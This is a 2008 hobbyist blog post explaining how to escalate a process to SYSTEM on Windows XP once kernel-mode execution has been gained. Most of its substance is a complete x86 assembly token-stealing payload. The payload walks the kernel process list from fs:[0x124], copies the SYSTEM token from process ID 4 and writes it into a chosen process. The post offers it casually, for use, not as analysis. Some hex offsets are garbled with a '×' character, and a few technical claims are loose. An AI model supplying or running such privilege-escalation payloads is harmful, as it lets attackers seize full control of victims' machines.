Dark SEO Programming
SEO Tools. I code ‘em.

So you’ve found a vulnerability in Windows XP that drops you into kernel mode and there you are thinking hehehehe (this is an evil laugh) I can do whatever I want. The only issue is you call win32 function after win32 function only to realise that in ring 0 kernel mode you can’t do dick. After the tenth reset of your PC you realise that you have to be in ring 3 to actually run any proper code. So you play around and you find out that you can modify memory and change a few strings. Ohhhh, the power! You can change some strings. This is pointless.

You read up on some kernel mode functions and you find out that the SYSENTER and SYSCALL commands can be used to enter some kernel functions that will give you basic disk access. However if you use the wrong command on the wrong processor it will probably crash. It’s a start but it’s a heck of a lot of code checking for the correct processor type and then actually to get it to do anything useful. You can’t just access files in the normal way and you can bet if we try and allocate some heap memory it will… crash… again. And then you think yep, of course it will, heap memory allocation is carried out by win32 api functions which run in ring 3 user mode. Fuck it!

So here’s the answer. It took me ages to find this and get it to compile. At fs:[0×124] in windows xp there just so happens to be an array. I forget exactly how it’s laid out but it has all the processes running in it along with… the user running the process. By default there is normally two users at least. SYSTEM and the current running user. SYSTEM has full access to everything. I like the sound of that. Now process number ID 4 in windows xp is always running as SYSTEM. As long as we know the process ID of a process we would like to run as SYSTEM we can just copy the user ID token into our preferred process. Here it goes, my compiler wouldn’t accept all the comments, and I’ve had to put them back…:

pushad

; get the start of the structure into eax
mov eax,dword ptr fs:[0×124]
mov eax,[eax+0×44]
push eax

s1:
mov eax,[eax+0×88]
sub eax,0×88
; Process ID 4 has the SYSTEM privilege token
cmp [eax+0×84],4
; if this process isn’t ID 4 check the next one
jne s1

; rip out the SYSTEM token
mov edi,[eax+0xC8]
and edi,0xfffffff8

; this assumes we are running a c program with a integer called elevpid
mov ebx, _elevpid

s2:
; keep moving down the process list
mov eax,[eax+0×88]
sub eax,0×88
; this is our process id we want to be SYSTEM
cmp [eax+0×84],ebx
jne s2

; copy the user token into our own process
mov [eax+0xC8],edi

pop eax

popad

Oh yeah and don’t enter the wrong process ID into this. It will keep scanning through memory until it runs out of memory to scan. And ring 0 is really not a place you want to get stuck in an infinite loop.

This entry was posted on Tuesday, April 29th, 2008 at 2:17 pm and is filed under mini script. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed.